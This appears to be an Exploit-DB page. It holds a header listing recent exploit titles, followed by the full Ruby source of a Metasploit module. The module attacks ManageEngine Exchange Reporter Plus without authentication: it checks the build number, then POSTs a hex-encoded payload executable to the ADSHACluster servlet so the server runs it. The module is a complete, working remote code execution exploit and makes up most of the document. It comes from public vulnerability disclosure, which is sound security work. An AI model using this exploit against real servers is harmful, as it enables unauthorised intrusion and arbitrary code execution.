
10 changes to exploits/shellcodes G DATA Total Security 25.4.0.3 - Activex Buffer Overflow Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit) HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit) HID discoveryd - 'command_blink_on' Remote Code Execution (Metasploit) IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit) IBM QRadar SIEM - Remote Code Execution (Metasploit) Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit) Apache CouchDB - Arbitrary Command Execution (Metasploit) phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit) Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit) Dolibarr 3.2.0 < Alpha - File Inclusion Dolibarr ERP/CRM 3.2.0 < Alpha - File Inclusion Dolibarr ERP/CRM - OS Command Injection Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection Dolibarr ERP/CRM 3.4.0 - 'exportcsv.php?sondage' SQL Injection Dolibarr CMS 3.5.3 - Multiple Vulnerabilities Dolibarr ERP/CRM 3.5.3 - Multiple Vulnerabilities Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting Dolibarr ERP/CRM 3.0 - Local File Inclusion / Cross-Site Scripting Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection Dolibarr ERP/CRM 3.1.0 - '/user/index.php' Multiple SQL Injections Dolibarr ERP/CRM 3.1.0 - '/user/info.php?id' SQL Injection Dolibarr ERP/CRM 3.1.0 - '/admin/boxes.php?rowid' SQL Injection Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities Dolibarr 7.0.0 - SQL Injection Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection Dolibarr ERP CRM < 7.0.3 - PHP Code Injection Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution WAGO e!DISPLAY 7300T - Multiple Vulnerabilities QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery
91 lines
No EOL
2.5 KiB
Ruby
Executable file
91 lines
No EOL
2.5 KiB
Ruby
Executable file
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
include Msf::Exploit::EXE
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Manage Engine Exchange Reporter Plus Unauthenticated RCE',
|
|
'Description' => %q{
|
|
This module exploits a remote code execution vulnerability that
|
|
exists in Exchange Reporter Plus <= 5310, caused by execution of
|
|
bcp.exe file inside ADSHACluster servlet
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Kacper Szurek <kacperszurek@gmail.com>'
|
|
],
|
|
'References' =>
|
|
[
|
|
['URL', 'https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html']
|
|
],
|
|
'Platform' => ['win'],
|
|
'Arch' => [ARCH_X86, ARCH_X64],
|
|
'Targets' => [['Automatic', {}]],
|
|
'DisclosureDate' => 'Jun 28 2018',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('TARGETURI', [ true, 'The URI of the application', '/']),
|
|
Opt::RPORT(8181),
|
|
])
|
|
|
|
end
|
|
|
|
def bin_to_hex(s)
|
|
s.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join
|
|
end
|
|
|
|
def check
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion')
|
|
})
|
|
|
|
unless res
|
|
vprint_error 'Connection failed'
|
|
return CheckCode::Safe
|
|
end
|
|
|
|
unless res.code == 200
|
|
vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
|
|
return CheckCode::Safe
|
|
end
|
|
|
|
begin
|
|
json = res.get_json_document
|
|
raise if json.empty? || !json['BUILD_NUMBER']
|
|
rescue
|
|
vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
|
|
return CheckCode::Safe
|
|
end
|
|
|
|
vprint_status "Version: #{json['BUILD_NUMBER']}"
|
|
|
|
if json['BUILD_NUMBER'].to_i <= 5310
|
|
return CheckCode::Appears
|
|
end
|
|
|
|
CheckCode::Safe
|
|
end
|
|
|
|
def exploit
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'),
|
|
'vars_post' => {
|
|
'MTCALL' => "nativeClient",
|
|
'BCP_RLL' => "0102",
|
|
'BCP_EXE' => bin_to_hex(generate_payload_exe)
|
|
}
|
|
})
|
|
end
|
|
end |